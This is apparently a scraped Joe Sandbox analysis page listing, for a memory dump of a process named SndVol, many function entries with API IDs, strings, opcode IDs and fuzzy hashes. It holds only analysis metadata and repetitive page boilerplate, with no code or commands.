                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: System Volume Information
                                                                                                                                                  • API String ID: 2994545307-764423717
                                                                                                                                                  • Opcode ID: 0e00798f3b80a30a4d5640523398a593f66cc7bf5e3ebe71a4f977c0bc4bb7ac
                                                                                                                                                  • Instruction ID: df62ae9814d9f66357e6dbed2e09662e13d2cdc60ff77b82a4adc3842d991455
                                                                                                                                                  • Opcode Fuzzy Hash: 0e00798f3b80a30a4d5640523398a593f66cc7bf5e3ebe71a4f977c0bc4bb7ac
                                                                                                                                                  • Instruction Fuzzy Hash: 856179B1508315AFD311DF54CC80E6BB7E9EF98B94F50092EF980972A0D674DD54CBA2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                  • Instruction ID: a8b5dc71db1cf3c0ea4871543f7c01a2735fa8d212d87dc8925a7512e508041c
                                                                                                                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                  • Instruction Fuzzy Hash: 376149B5D00219EBEB158F9AC840BDEBBF8EF84754F544539E810AB290DB758A01CB91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: XHd
                                                                                                                                                  • API String ID: 0-999235122
                                                                                                                                                  • Opcode ID: 17c105eded6220e23532fcb9319d7708f629bdce2d2de2d45214a286c3172c82
                                                                                                                                                  • Instruction ID: 2a7db643a9d7c02afcfb6b443ff5c0062c467851e3008c4bd3f1c1fae1cf1ae5
                                                                                                                                                  • Opcode Fuzzy Hash: 17c105eded6220e23532fcb9319d7708f629bdce2d2de2d45214a286c3172c82
                                                                                                                                                  • Instruction Fuzzy Hash: E2816B75A00209DFDB09CFA8C491AAEBBF1FF88344F1581A9D859EB341D734EA51CB91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                  • Instruction ID: a9bdfe6f01a08e49b943f660af36d158b38b407dc523a9de8456398748d38a7d
                                                                                                                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                  • Instruction Fuzzy Hash: 29518BB2914345BFE7119F65CC50F5AB7ECFB84794F800929BA8097291D7B0ED14CB92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                                                                                                  • Instruction ID: 093ff68ccf22734a801b32b04f5c62b2854d30c960c8009eb9ba050658d2446f
                                                                                                                                                  • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                                                                                                  • Instruction Fuzzy Hash: 5F515C715047109FD321CF59C840A5BB7F8FF88754F40892EF9959B690E7B4E904CB96
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PreferredUILanguages
                                                                                                                                                  • API String ID: 0-1884656846
                                                                                                                                                  • Opcode ID: 2c3acf41ceb91eccf8ca9c9137485cc73723029ab3856cf356abcf460942a4be
                                                                                                                                                  • Instruction ID: ca819b980dc622005021f8b013435c38a77bafabea6c378d09d7d79bb73d040e
                                                                                                                                                  • Opcode Fuzzy Hash: 2c3acf41ceb91eccf8ca9c9137485cc73723029ab3856cf356abcf460942a4be
                                                                                                                                                  • Instruction Fuzzy Hash: 64419076D00219EBDB13EE96CC40BEEB7B9EF84794F51416AE901AB250DA34DE40C7A1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: verifier.dll
                                                                                                                                                  • API String ID: 0-3265496382
                                                                                                                                                  • Opcode ID: fbcf8a49e4c118994e05eaccd1a3e4101f448062b31fa0cc15b61b6a325d5634
                                                                                                                                                  • Instruction ID: 297bdce390d525b3c9d0791a902e4abe1d1019de0ccf82db0ed3549f6b1cdf0b
                                                                                                                                                  • Opcode Fuzzy Hash: fbcf8a49e4c118994e05eaccd1a3e4101f448062b31fa0cc15b61b6a325d5634
                                                                                                                                                  • Instruction Fuzzy Hash: 7431A9B5A10301BFD7649F39D860B6677E6EB48790F90457AE645DF380EA318C81C791
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlValidateHeap
                                                                                                                                                  • API String ID: 0-1797218451
                                                                                                                                                  • Opcode ID: 852ae75f493b17a46bc826eac827efe6a6d73b3f22aebd8d0637800ab5ab05ad
                                                                                                                                                  • Instruction ID: 9eb8564fc9346bfd31cc6c3ccc32e28471a6d4b88c2d1c1a588d8946fe1d589b
                                                                                                                                                  • Opcode Fuzzy Hash: 852ae75f493b17a46bc826eac827efe6a6d73b3f22aebd8d0637800ab5ab05ad
                                                                                                                                                  • Instruction Fuzzy Hash: A4411176B007A69FEF02CF74C8947AEBBB2BF81254F548678D4516B680CB349901CF91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: kLsE
                                                                                                                                                  • API String ID: 0-3058123920
                                                                                                                                                  • Opcode ID: f559a1d65f713fdf840b0a2754c4b5bf3d347f62ce55e83f40dd329d6e2aa9f9
                                                                                                                                                  • Instruction ID: 5336bc9ab5872ec4ae01f035c2d441cbb4cfeaa803e413312d4395a7c33deb63
                                                                                                                                                  • Opcode Fuzzy Hash: f559a1d65f713fdf840b0a2754c4b5bf3d347f62ce55e83f40dd329d6e2aa9f9
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d2d481b64e82e2e39477399e6a68bebd3e85aaac5547520ac4e4e5c41851e001
                                                                                                                                                  • Instruction ID: f878ebcf77b4fddf36e9adfbd61cc60d5bbd8678a902e6bfaf63c5f99d6115fb
                                                                                                                                                  • Opcode Fuzzy Hash: d2d481b64e82e2e39477399e6a68bebd3e85aaac5547520ac4e4e5c41851e001
                                                                                                                                                  • Instruction Fuzzy Hash: 50B112B5A083809FD754CF29C980A5AFBF1BB89344F54496EF899C7351D730E845CB82
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                  • Instruction ID: c012718152eeaf6f1daab0b0fd494c215c643e45094c20949ebe0c867411a5cb
                                                                                                                                                  • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                  • Instruction Fuzzy Hash: B671D579E0421A9BDB06EF66C8C0AAEB7F5BF447D0F94451EDC00AB241E734E951CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                  • Instruction ID: 6c4af3cff1ac767c3077506ac9b3e088b16fbc9790378a3c9a80563fcccf979f
                                                                                                                                                  • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                  • Instruction Fuzzy Hash: 1D81BE76E11216DBEF04CF59C880B9DB7B2EBC4344F58863AC815BB244DA329900CF91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                                                                  • Instruction ID: 33c76c410daee98c1d125cf894dda4b6866dbfb17f3b848a313d781489fff00b
                                                                                                                                                  • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                                                                  • Instruction Fuzzy Hash: 9981BD74A00706AFD715CFA9C880B9ABBF5FF48344F10856AE956D7391D730E940CBA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2e9ebb6171f0de1bfad3b3ded9cde13dd3b55d79a1ec617b17e1794ef156fa6a
                                                                                                                                                  • Instruction ID: cf06f0c532b4339a1a190814ceeb03e12469e3d5c70ff5bb70ee4f3fa7dcd6b8
                                                                                                                                                  • Opcode Fuzzy Hash: 2e9ebb6171f0de1bfad3b3ded9cde13dd3b55d79a1ec617b17e1794ef156fa6a
                                                                                                                                                  • Instruction Fuzzy Hash: D2718175E01264EFDB11CF99D840AADB7B5FF89794F644025E840BB2A0DB30EC51CBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8a1a1909bceff9405f719479243c91a84c081177ead5c7775a5f59aa7d3c2a86
                                                                                                                                                  • Instruction ID: d97297ca088d100158ace22fe642c550854c6ccaa0f14b2048b27089bc4f5690
                                                                                                                                                  • Opcode Fuzzy Hash: 8a1a1909bceff9405f719479243c91a84c081177ead5c7775a5f59aa7d3c2a86
                                                                                                                                                  • Instruction Fuzzy Hash: 8061BEB5600755AFD311CF65CC81BABBBA9FF88394F024619FA5987240DB30E914CBD2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5a89224d3fcb2e021aea936bd1884f6dd9fc1912268365e7947b1bddfa1a21b6
                                                                                                                                                  • Instruction ID: e7492e00cebbe33989c75799f0902adc24d4f38049c347ad3d1b02090194945c
                                                                                                                                                  • Opcode Fuzzy Hash: 5a89224d3fcb2e021aea936bd1884f6dd9fc1912268365e7947b1bddfa1a21b6
                                                                                                                                                  • Instruction Fuzzy Hash: C4613C75E00606AFEB08CF68C894A9DFBF6FB88244F24857AD519A7300DB30A951CFD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d547f68b4373d57103de1f5e2581964c17f9745382cde5362eaa7398d5defdeb
                                                                                                                                                  • Instruction ID: 93080bdb82cf7ef4ca18a8cddcd035ba2e19a458b80ed9328d81cc7bfbb1e716
                                                                                                                                                  • Opcode Fuzzy Hash: d547f68b4373d57103de1f5e2581964c17f9745382cde5362eaa7398d5defdeb
                                                                                                                                                  • Instruction Fuzzy Hash: E86119756047C2CBE301CF65C996B5AB7E0FF80388F16466CEA998B291DB75DC05CB82
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                                                                                                  • Instruction ID: 3914886fd8860702a906a5e921fccd870c129e1afeb37699c1375cc34a6f402b
                                                                                                                                                  • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                                                                                                  • Instruction Fuzzy Hash: D7511C7D9002169BDB05EF59C890ABEB7B5BF42BC4B90805EE8549B301EB35CD82C7D1
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ffc5208a2d26122a40cc97d5b5326a8cf37b981a450eae8e1e5a8e40c64c8457
• Instruction ID: c51f6ace3757361e8744934b4fa759cc7df005f551a09461afa7bfc62f7dc92b
• Opcode Fuzzy Hash: ffc5208a2d26122a40cc97d5b5326a8cf37b981a450eae8e1e5a8e40c64c8457
• Instruction Fuzzy Hash: C251DEB1504344AFE724DF64CC94F6A7BA9EB897A4F50063DEA1197291DB30D801CBA6
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ccff2b812edcffa9d62725e4ab8104448c4b81361898ec6a8abd1d9e5232e3f7
• Instruction ID: df463704ac8a2c28614769d6aecf81d81a7a3fd3790a63ac5da258271f70ff54
• Opcode Fuzzy Hash: ccff2b812edcffa9d62725e4ab8104448c4b81361898ec6a8abd1d9e5232e3f7
• Instruction Fuzzy Hash: 10519A70D10318EFEB218FA5CC80B9DBBB9EF42344FA0453AE990AB191DB728844DF51
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: eaa90def8fa972877180565140bbd956541211495663402534f563d97d967db5
                                                                                                                                                  • Instruction ID: 5a3203ef441dbe967af8c63cddec81325496b26b4d659bbc6dbb5c7fb22fd354
                                                                                                                                                  • Opcode Fuzzy Hash: eaa90def8fa972877180565140bbd956541211495663402534f563d97d967db5
                                                                                                                                                  • Instruction Fuzzy Hash: 50417676D0022AABDB129FE9CC84AAFB7BCAF44694F410576E900E7200D635DD00DBE5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                  • Instruction ID: 37d439e6df3f91924f2c54d57e99c2ed96a45c2adf8d974f46b91c4580f2c3ff
                                                                                                                                                  • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                  • Instruction Fuzzy Hash: 9E519E71600606EFDB05CF16D980A46BBF5FF85348F1580BAE808EF222E771E945CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14546308a7042c395d32a1c85846ed589ae2c83d54371cb0568ece2aeb8f91b1
                                                                                                                                                  • Instruction ID: 2e9b745d4ddba5b96aba153f51d68127d89fb6e88b491f89db9c9de3db1de376
                                                                                                                                                  • Opcode Fuzzy Hash: 14546308a7042c395d32a1c85846ed589ae2c83d54371cb0568ece2aeb8f91b1
                                                                                                                                                  • Instruction Fuzzy Hash: 6351AD76A14B91CFE711CB19C840B9A73E5EB84798F4506B5F804CF691EB39DC40CBA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
